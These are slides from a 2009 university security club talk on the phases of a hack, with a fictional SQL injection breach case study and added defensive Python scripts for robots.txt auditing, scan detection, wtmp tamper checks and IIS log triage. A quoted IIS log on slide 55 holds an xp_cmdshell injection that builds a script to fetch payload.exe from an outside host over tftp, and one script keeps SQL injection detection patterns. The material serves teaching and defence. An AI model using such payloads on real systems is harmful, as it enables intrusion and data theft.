1. INFORMATION ASSURANCE CLUB
2. INFORMATION ASSURANCE CLUB
Anatomy of a Hack: from 0x00 to root
Thursday, October 29th, 2009
Thursday, November 5th
7:30 PM – 202 IST
Friday, December 4th
See listserv email or http://iaclub.ist.psu.edu/ictf
for more information and to sign up!
Deadline for sign-ups is Friday, November 6th!
Dean Feedback Session
Tuesday, November 3rd
7:00pm to 9:00pm in 110 IST
The Anatomy of the Hack
6. ESSENTIAL TERMINOLOGY
THREAT – an action or event that might
compromise security. A threat is a potential
violation of security.
VULNERABILITY – existence of a
weakness, design, or implementation error
that can lead to an unexpected and
undesirable event compromising the security
of the system.
7. ESSENTIAL TERMINOLOGY
ATTACK – an assault on the system security
that is derived from an intelligent threat. An
attack is any action that violates security.
EXPLOIT – a defined way to breach the
security of an IT system through a
8. HACKER CLASSES
Black hats – individuals with extraordinary
computing skills, resorting to malicious or
destructive activities. Also known as crackers.
White hats – individuals professing hacker
skills and using them for defensive purposes.
Also known as security analysts.
Gray Hats – individuals who work both
offensively and defensively at various times.
Suicide Hackers – individuals who aim to bring
down critical infrastructure for a “cause”
(Hacktivism) and do not worry about punishment.
9. QUALITIES OF A HACKER
Should be proficient with programming and computer
Has in-depth knowledge of target platforms, such as
Windows, Unix and Linux
Has exemplary knowledge of networking and related
hardware and software
Should be familiar with vulnerability research
Should have mastery in different hacking techniques
In other words, you must be “highly technical” to launch
Should be prepared to follow a strict code of conduct
“If you know the enemy and know yourself, you need not
fear the result of a hundred battles.”
-Sun Tzu, Art of War
A hacker / security professional answers the following:
What can the intruder see on the target system? (Recon and
What can the intruder do with that information?
(Gaining and Maintaining Access)
Does anyone at the target notice the intruders’ attempts or
successes? (Recon and covering tracks)
Professionals need to know what it is they are trying to
protect, against whom, and what resources they are willing
to expend in order to gain protection.
11. THE FIVE PHASES
Denial of Service
Operating system level / application level
Uploading / altering / downloading programs or data
12. PHASE 1 - RECONNAISSANCE
Reconnaissance refers to the preparatory
phase where an attacker seeks to gather as
much information as possible about a target
prior to launching an attack.
Generally noted as “rattling the door knobs”
to see if someone is watching and
Could be the future point of return, noted for
ease of entry for an attack when more about the
target is known on a broad scale.
13. RECONNAISSANCE TYPES
Passive reconnaissance involves acquiring
information without directly interacting with
Ex: Searching public records or news releases.
Active reconnaissance involves interacting
with the target directly by any means.
Ex: Telephone calls to help desk or technical
14. RECON TECHNIQUES
Job search sites (job requirements)
Google search / Google hacking
Rich information for passive recon
Footprinting is necessary to systematically
and methodically ensure that all pieces of
information are identified.
Footprinting is often the most difficult task in
the hacker methodology.
An attacker spends 90% of the time profiling
an organization and another 10% launching
• Domain Name
• Network block
• IP addresses of reachable systems
• TCP and UDP services running
• System architecture
• Intrusion Detection Systems
• System enumeration (user and group
names, system banners, routing tables,
• Analog/digital telephone numbers
• Remote system types
• Authentication mechanisms
• Network protocols used
• Internal domain names
• Network blocks
• IP addresses of reachable systems
• TCP and UDP services running
• System architecture
• Intrusion Detection Systems
• System enumeration
• Connection origination and
• Type of connection
• Access control mechanisms
Located in the root folder and holds a list of
directories and other resources that a site
owner does not want indexed.
Hackers usually look here first!
All (most) search engines comply with
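Because robots.txt is public and is one of the first things a reconnaissance pass reads, the defender's check is to audit your own file for Disallow entries that advertise admin panels, backups or login pages. The script below is an added example, not code from the slides: it parses a robots.txt (the sample text and the SENSITIVE keyword list are constructed assumptions, not from any real site), honours the rule that consecutive User-agent lines share the Disallow lines that follow, and lists the paths that should be protected by authentication rather than hidden by a crawler directive.

```python
"""Audit a site's own robots.txt for Disallow entries that advertise
sensitive paths. Added example, not code from the original slides; the
robots.txt text and the SENSITIVE keyword list are constructed assumptions."""
import re

# Constructed sample robots.txt, not taken from any real site.
SAMPLE_ROBOTS = """# internal note: keep crawlers out of the admin area
User-agent: *
Disallow: /images/
Disallow: /admin/
Disallow: /backup/db_2009.sql
Disallow: /members/profile.asp

User-agent: Googlebot
User-agent: Bingbot
Disallow: /old-cms/login.php
Allow: /
"""

# Path fragments that usually mean "this belongs behind auth, not in robots.txt".
SENSITIVE = re.compile(r"admin|backup|login|private|config|\.sql$|\.bak$", re.I)


def parse_robots(text):
    """Return {user_agent: [disallowed paths]}.

    Consecutive User-agent lines form one group that shares the Disallow lines
    that follow them; comments (#) and blank lines are ignored."""
    rules = {}
    agents = []
    collecting_agents = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            if not collecting_agents:      # first agent line of a new group
                agents = []
            agents.append(value)
            rules.setdefault(value, [])
            collecting_agents = True
        else:
            collecting_agents = False
            if key == "disallow" and value:
                for agent in agents:
                    rules.setdefault(agent, []).append(value)
    return rules


def audit_robots(text):
    """Sorted list of disallowed paths that look sensitive, across all agents."""
    rules = parse_robots(text)
    return sorted({path for paths in rules.values() for path in paths
                   if SENSITIVE.search(path)})


if __name__ == "__main__":
    for path in audit_robots(SAMPLE_ROBOTS):
        print("robots.txt discloses:", path)
```

The fix for a flagged path is not to delete the Disallow line (the resource would then be crawled) but to require authentication on it and to keep backups and old installs out of the web root entirely.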
19. PHASE 2 - SCANNING
Scanning refers to the pre-attack phase
when the hacker scans the network for
specific information on the basis of
information gathered during reconnaissance.
Hackers have to get a single point of entry to
launch an attack.
Scanning can include use of dialers, port
scanners, network mapping, sweeping,
vulnerability scanners, etc.
20. PHASE 2 - SCANNING
Types of scanning:
Port scanning – a series of messages sent to a
computer to learn about services.
Network Scanning – a procedure for identifying
active hosts on a network.
Vulnerability Scanning – automated process of
proactively identifying vulnerabilities of
21. SCANNING PHASES
Check for live
Check for open
Prepare proxies ATTACK!
22. CHECKING FOR LIVE SYSTEMS
ICMP scanning – find if hosts are running by
pinging them all.
ICMP scans can be run in parallel so they are
Tools: Angry IP Scanner, Ping Sweep, Firewalk
23. CHECKING FOR OPEN PORTS
Rapidly scans large networks
Port scanning, OS detection, version detection,
Scans a large number of machines at one time
Supported by many operating systems
Carries out all types of port scanning techniques
24. CHECKING FOR OPEN PORTS
Command line oriented TCP/IP packet assembler/analyzer
Has a traceroute mode
Ability to send files over a covert channel
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
25. PORT SCANNING BASICS
The TCP/IP three-way handshake
SYN -> SYN/ACK -> ACK
SYN – initiates request
ACK – establishes connection
PSH – send all buffered data immediately
URG – packet should be processed immediately
FIN – no more transmissions
RST – reset connection
26. COMMON PORT SCANS
TCP Connect Scan (-sT)
Response is SYN/ACK if open, RST if closed.
SYN Scan (half open scan) (-sS)
SYN -> SYN/ACK -> RST
Fewer sites log this type of scan.
Server responds with RST if port is closed.
27. COMMON PORT SCANS
FIN Scan (-sF)
Xmas Scan (-sX)
Null Scan (-sN)
Return RST if closed, no response if open.
Called stealth because they send a single frame
to a TCP port without handshake.
Windows didn’t follow RFC 793 (Transmission
Control Protocol) so it responds with an RST
frame for all queries.
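Seen from the defender's side, the flag combinations on slides 25 to 27 are exactly what an IDS or host firewall keys on. The following is an added example, not code from the slides: it classifies a lone inbound TCP segment by its flags (SYN only, no flags, FIN only, or FIN+PSH+URG) and then reports any source that probed many distinct (host, port) pairs without ever completing a handshake. The traffic records are constructed in the script rather than captured; in practice they would come from a pcap or a firewall log.

```python
"""Classify handshake-less TCP segments by flag combination and flag sources
that probe many ports. Added example, not code from the original slides; the
traffic records below are constructed, not captured."""
from collections import defaultdict

# TCP flag bits as they sit in the header (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags):
    """Name the scan type an inbound segment with exactly these flags suggests.

    Anything carrying ACK belongs to an established or in-progress connection
    and is not treated as a probe."""
    if flags == SYN:
        return "syn"             # -sS, or the first segment of a -sT connect scan
    if flags == 0:
        return "null"            # -sN: no flags set
    if flags == FIN:
        return "fin"             # -sF: FIN with no prior handshake
    if flags == FIN | PSH | URG:
        return "xmas"            # -sX: FIN, PSH and URG "lit up"
    return "other"


def detect_scans(records, port_threshold=10):
    """records: iterable of (src_ip, dst_ip, dst_port, flags).

    Returns {src_ip: {"ports": distinct_targets, "types": {kind: count}}} for
    every source that probed at least port_threshold distinct (host, port)
    pairs. A single SYN from a client is indistinguishable from a one-port
    scan, so the threshold is what separates the two."""
    per_src = defaultdict(lambda: {"targets": set(), "types": defaultdict(int)})
    for src, dst, dport, flags in records:
        kind = classify_probe(flags)
        if kind == "other":
            continue
        per_src[src]["targets"].add((dst, dport))
        per_src[src]["types"][kind] += 1
    return {src: {"ports": len(v["targets"]), "types": dict(v["types"])}
            for src, v in per_src.items() if len(v["targets"]) >= port_threshold}


def build_sample():
    """Constructed traffic: a SYN scanner, an Xmas scanner and one normal client."""
    records = [("198.51.100.7", "10.0.5.13", port, SYN) for port in range(1, 21)]
    records += [("203.0.113.9", "10.0.5.13", port, FIN | PSH | URG)
                for port in (21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3389)]
    records += [("192.0.2.10", "10.0.5.13", 80, SYN),          # handshake
                ("192.0.2.10", "10.0.5.13", 80, ACK),
                ("192.0.2.10", "10.0.5.13", 80, PSH | ACK)]    # request data
    return records


if __name__ == "__main__":
    for src, info in detect_scans(build_sample()).items():
        print(f"{src}: {info['ports']} targets, {info['types']}")
```

Two points the slides make carry over directly. Because Windows answers FIN, Xmas and Null probes with RST no matter what, those probes learn nothing about a Windows host, but they are still on the wire, so the detector counts them regardless of what the target replied. And in an idle scan (slide 28) the packets arrive from the zombie's address, so this logic attributes the activity to the observed source; finding the real origin then means examining the zombie.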
28. COMMON PORT SCANS
Idle Scan (-sI)
Completely blind port scanning! Attackers can
actually scan a target without sending a single
packet to the target from their own IP address.
Every IP packet has a “fragment identification”
number, which is incremented by the stack.
Probing the number can tell an attacker how many
packets have been sent since the last probe.
Find a zombie (idle) machine. Spoof packet from
zombie, zombie gets SYN/ACK if open and sends
RST and increments IPID, gets RST if closed (no
29. BANNER GRABBING / FINGERPRINTING
Determine the operating system on the target
Active stack fingerprinting
Based on the fact that OS vendors implement the TCP
Specially crafted packets are sent to remote OS and the
response is noted and compared with a database.
This type of scan is logged.
Indirect methods; Uses sniffing techniques instead of
Also based on differential implementation of the stack.
30. SCANNING FOR VULNERABILITIES
Nessus – most common tool.
NASL (Nessus attack scripting language).
Can test unlimited hosts simultaneously.
Smart service recognition.
31. PREPARING PROXIES
Proxy is a network computer that can serve
as an intermediary for connection with other
As a firewall, a proxy protects the local network from
Acts as an IP address multiplexer, allows a connection
from a number of computers having only one IP
Anonymous web surfing (to an extent).
Specialized proxies can filter unwanted content, such
as ads or “unsuitable” material.
32. PREPARING PROXIES
A hacker wants to use a proxy to hide their
May use multiple proxies (proxy chains).
Allows users to perform various Internet tasks
despite restrictions imposed by firewalls.
This is made possible by sending data through
HTTP (port 80).
34. PHASE 3 – GAINING ACCESS
Gaining access refers to the penetration phase. The
hacker exploits the vulnerability in the system.
The exploit can occur over a LAN, the Internet, or as
a deception or theft.
Examples include buffer overflows, denial of service,
session hijacking, and password cracking.
Influencing factors include architecture and
configuration of the target system, the skill level of the
attacker, and the initial level of access obtained.
The hacker can gain access at the operating system
level, application level, or network level.
Enumeration is defined as extraction of user
names, machine names, network resources,
shares, and services.
Enumeration leads to an attack
Step 1: Enumerate users
Step 2: Crack the password
Step 3: Escalate privileges
Step 4: Execute applications
Can bypass steps depending on the nature of
36. ATTACK SOPHISTICATION
US GAO report to Congress, “Computer Attacks at Department of Defense Pose Increasing Risks”, May 1996.
37. ATTACK SOPHISTICATION
CERT - “Information Security as an Institutional Priority” - 2005
38. HOW TO GAIN ACCESS
There are several ways an attacker can gain
access to a system.
The attacker must be able to exploit a
weakness or vulnerability in a system.
39. OPERATING SYSTEM ATTACKS
Today’s operating systems are complex in nature.
Operating systems run many services, ports, and
modes of access and require extensive tweaking to
lock them down.
The default installation of most operating systems
has large numbers of services running and ports
Applying patches and hotfixes is not easy in today’s
Attackers look for OS vulnerabilities and exploit them
to gain access to a network system.
40. APPLICATION LEVEL ATTACKS
Software developers are under tight schedules to deliver products
Extreme Programming is on the rise in software engineering
Software applications come with tons of functionalities and
Sufficient time is not there to perform complete testing before
Security is often an afterthought and usually delivered as an “add-
Poor or non-existent error checking in applications leads to buffer
41. SHRINK WRAP CODE ATTACKS
Why reinvent the wheel when you can buy off-
the-shelf libraries and code?
When you install an OS or application, it comes
with tons of sample scripts to make the life of an
The problem is “not fine tuning” or customizing
This will lead to default code or shrink wrap
42. MISCONFIGURATION ATTACKS
Systems that should be fairly secure are hacked
because they were not configured correctly.
Systems are complex and the administrator does not
have the necessary skills or resources to fix the
Administrator will create a simple configuration that
In order to maximize your chances of configuring a
machine correctly, remove any unneeded services or
43. IMPORTANT RULE
If a hacker wants to get inside your system,
they will and there is nothing you can do
The only thing you can do is make it harder
for them to get in.
“If you approach a bear with a friend, you
don’t have to outrun the bear… just your
44. PHASE 4 – MAINTAINING ACCESS
Maintaining access refers to the phase where
the hacker tries to retain ownership of the
The hacker has compromised the system.
Hackers may harden the system from other
hackers as well (to own the system) by securing
their exclusive access with backdoors, rootkits,
Hackers can upload, download, or manipulate
data, applications, and configurations on the
45. PHASE 5 – COVERING TRACKS
Covering tracks refers to the activities that
the hacker does to hide their actions.
Reasons include the need for prolonged stay,
continued use of resources, removing
evidence of hacking, or avoiding legal action.
Examples include steganography, tunneling,
and altering log files.
46. LOG FILES
Failed logins, accessing files without privileges
Driver failure, things not operating correctly
UTMP (information about current users)
WTMP (logins and logouts)
LASTLOG (last login)
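Since wtmp is one of the files an intruder edits when covering tracks, it helps to know what an edited copy looks like. The following is an added example, not code from the slides: it decodes wtmp records and applies two integrity checks, that timestamps in an append-only file never run backwards and that no record in the middle of the file is all zeros (the signature of an entry overwritten in place). The 384-byte record layout is the glibc x86_64 struct utmp, an assumption to verify against <utmp.h> on your platform, and the wtmp image is constructed in memory rather than read from /var/log/wtmp.

```python
"""Parse Linux wtmp records and flag signs of log editing. Added example,
not code from the original slides. The record layout is the glibc x86_64
struct utmp (384 bytes, an assumption: check <utmp.h> on your platform) and
the wtmp image is constructed in memory rather than read from /var/log/wtmp."""
import struct

# struct utmp: ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32],
# ut_host[256], ut_exit (2 x int16), ut_session, ut_tv (sec, usec as int32),
# ut_addr_v6[4], 20 reserved bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)      # 384 on the assumed layout

EMPTY, USER_PROCESS, DEAD_PROCESS = 0, 7, 8


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_wtmp(blob):
    """Decode whole records; a trailing partial record is skipped here and
    reported by audit_wtmp."""
    records = []
    for off in range(0, len(blob) - len(blob) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, blob[off:off + UTMP_SIZE])
        records.append({
            "type": f[0],
            "pid": f[1],
            "line": f[2].rstrip(b"\0").decode(errors="replace"),
            "user": f[4].rstrip(b"\0").decode(errors="replace"),
            "host": f[5].rstrip(b"\0").decode(errors="replace"),
            "time": f[9],                     # ut_tv.tv_sec
        })
    return records


def audit_wtmp(blob):
    """Return (findings, open_sessions).

    wtmp is append-only, so timestamps should never go backwards, and a
    zeroed record in the middle of the file is the signature of an entry
    that was overwritten rather than logged."""
    findings = []
    if len(blob) % UTMP_SIZE:
        findings.append("file length is not a multiple of the record size: truncated")
    open_sessions = {}
    last_time = 0
    for i, rec in enumerate(parse_wtmp(blob)):
        if rec["type"] == EMPTY:
            findings.append(f"record {i}: zeroed entry inside the file")
            continue
        if rec["time"] < last_time:
            findings.append(f"record {i}: timestamp goes backwards "
                            f"({rec['time']} < {last_time})")
        last_time = max(last_time, rec["time"])
        if rec["type"] == USER_PROCESS:
            open_sessions[rec["line"]] = rec["user"]
        elif rec["type"] == DEAD_PROCESS:
            open_sessions.pop(rec["line"], None)
    return findings, open_sessions


def build_sample_wtmp():
    """Constructed image: one clean session, a live session, then a zeroed
    record and a record whose clock runs backwards."""
    return b"".join([
        pack_record(USER_PROCESS, 4101, "pts/0", "alice", "10.0.5.20", 1000),
        pack_record(DEAD_PROCESS, 4101, "pts/0", "", "", 1600),
        pack_record(USER_PROCESS, 4190, "pts/1", "bob", "10.0.5.21", 2000),
        b"\0" * UTMP_SIZE,
        pack_record(USER_PROCESS, 4222, "pts/2", "carol", "10.0.5.22", 1500),
    ])


if __name__ == "__main__":
    findings, live = audit_wtmp(build_sample_wtmp())
    print("\n".join(findings) or "no findings")
    print("sessions still open:", live)
```

Neither check catches a careful full rewrite of the file, which is why the case study's lesson (slide 59) matters: copies of the same events in a second log source, ideally on another host, are what make erasure detectable.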
47. APPLICATION (INTERACTIVE)
Think like a hacker! Use your background
knowledge to figure out how the hacker
compromised this fictional company.
Scenario: An online store had their database
compromised and customers’ credit card
data stolen. The hacker knew nothing initially
but the name of the target company.
48. PHASE 1 - RECONNAISSANCE
What can the hacker learn about the target?
Where should they look for information?
49. PHASE 1 - RECONNAISSANCE
Hacker learns as much as they can about the
company from online resources.
Resolves IP address of the domain name.
WHOIS information is private, no action taken.
Finds job posting for a Windows Administrator
familiar with operating IIS and MSSQL.
50. PHASE 2 - SCANNING
What should the hacker scan?
What are some tools they could use?
51. PHASE 2 - SCANNING
The hacker uses nmap to map the network.
Finds only the webserver and a few other hosts in
the DMZ. Firewall blocks remote access to internal
Hacker fingerprints the webserver.
Running IIS 7.0 and ASP.
Locked down; ports closed and no extra services
Scans for vulnerabilities.
Systems are patched.
52. NETWORK DIAGRAM
53. PHASE 3 - GAINING ACCESS
What might the hacker do now?
What type of attack could they launch?
54. PHASE 3 - GAINING ACCESS
The hacker finds a SQL injection vulnerability in a web
This is confirmed by looking at the IIS logs:
2009-10-29 05:50:25 W3SVR1 10.0.5.13 GET
/members/profile.asp action=show&id=16705946’ -- 80 -
126.96.36.199 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-
US;+rv:188.8.131.52)+Gecko/20071127+Firefox/184.108.40.206 500 0 0
2009-10-29 05:55:13 W3SVR1 10.0.5.13 GET
;exec master..xp_cmdshell 'echo tftp ^&^& echo open 220.127.116.11
^&^& echo user h@ck3r ^&^& echo uber1337 ^&^& echo get payload.exe
^&^& echo quit%3Eexecute.bat'-- |331|80130e62|
Incorrect_syntax_near_the_keyword_'ORDER BY' 80 - 18.104.22.168
56. PHASE 3 - GAINING ACCESS
The hacker has been able to transfer
binaries to the web server and execute
The hacker cannot connect directly to the
database server as it is configured to only
allow connections from the internal network
and the webserver, but once the webserver
is compromised the hacker can use it to
extract database information.
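The IIS excerpt on slide 55 is the kind of evidence a defender can hunt for systematically, and the bug behind it has a standard fix. The following is an added example, not code from the slides: it parses IIS W3C extended log lines (constructed here in the style of the slide's excerpt), URL-decodes the query string and flags the signatures present in the slide's own log (a stray quote, a T-SQL comment, a stacked EXEC, xp_cmdshell), then contrasts a query built by string concatenation with a parameterized one. sqlite3 stands in for the MSSQL backend of the scenario; the table and rows are constructed.

```python
"""Triage IIS W3C logs for SQL injection attempts, and show why the
injected query worked. Added example, not code from the original slides;
the log lines are constructed in the style of the slide's IIS excerpt, and
sqlite3 stands in for the MSSQL backend the scenario describes."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed W3C extended log sample; the #Fields line names the columns.
SAMPLE_LOG = """#Software: constructed sample
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2009-10-29 05:49:01 10.0.5.13 GET /members/profile.asp action=show&id=16705946 80 192.0.2.44 200
2009-10-29 05:50:25 10.0.5.13 GET /members/profile.asp action=show&id=16705946%27+-- 80 192.0.2.44 500
2009-10-29 05:55:13 10.0.5.13 GET /members/profile.asp action=show&id=1%3Bexec+master..xp_cmdshell+%27echo+hi%27-- 80 192.0.2.44 500
2009-10-29 05:56:40 10.0.5.13 GET /images/logo.png - 80 198.51.100.2 200
"""

# Signatures seen in the slide's log: a stray quote, a T-SQL comment, a stacked
# EXEC, and xp_cmdshell. UNION SELECT is added as the other common extraction path.
INJECTION_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"'", r"--", r";\s*exec\b", r"\bxp_cmdshell\b", r"\bunion\b.+\bselect\b")]


def parse_w3c(text):
    """Yield one dict per log row, keyed by the names on the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            yield dict(zip(fields, line.split()))


def flag_injection(text):
    """Return (time, client ip, decoded query, matched patterns) per suspicious row."""
    hits = []
    for row in parse_w3c(text):
        query = unquote_plus(row.get("cs-uri-query", "-"))
        matched = [p.pattern for p in INJECTION_PATTERNS if p.search(query)]
        if matched:
            hits.append((row["time"], row["c-ip"], query, matched))
    return hits


def demo_db():
    """In-memory stand-in for the store's member table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members(id INTEGER, name TEXT);
        INSERT INTO members VALUES (1, 'alice'), (2, 'bob');
    """)
    return db


def lookup_vulnerable(db, user_id):
    """The slide's bug: the request value is pasted into the SQL text."""
    return [r[0] for r in db.execute(
        "SELECT name FROM members WHERE id = " + user_id)]


def lookup_parameterized(db, user_id):
    """The fix: the value is bound as data and can never change the statement."""
    return [r[0] for r in db.execute(
        "SELECT name FROM members WHERE id = ?", (user_id,))]


if __name__ == "__main__":
    for time, ip, query, matched in flag_injection(SAMPLE_LOG):
        print(time, ip, query, "->", matched)
    db = demo_db()
    print("vulnerable:", lookup_vulnerable(db, "0 OR 1=1"))
    print("parameterized:", lookup_parameterized(db, "0 OR 1=1"))
```

The 500 status on the flagged rows is the second signal: a malformed id that produces a database error, as in the slide's "Incorrect syntax" message, is the probing step that precedes the working payload. Pairing a status-500 spike with quote or comment characters in the query string catches the attempt before xp_cmdshell ever appears, and the parameterized lookup is what makes the later steps impossible in the first place.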
57. PHASE 4 - MAINTAINING ACCESS
How can the hacker maintain access to the
58. PHASE 4 - MAINTAINING ACCESS
The hacker can maintain access by installing
rootkits or backdoors.
The hacker may also harden the system to
prevent SQL injection attacks similar to the
ones they used.
59. PHASE 5 - COVERING TRACKS
The hacker erased firewall and IDS logs as
well as the audit logs on the system, but they
forgot to edit the IIS connection logs.
What are the consequences of this action,
from both the hacker’s and the system
Hacking is an art, not a science.
Hackers need only a single point of entry.
You’re only as strong as your weakest link.
Where there’s a will, there’s a way.
Never underestimate a Hacker’s determination.
Security should never be an afterthought.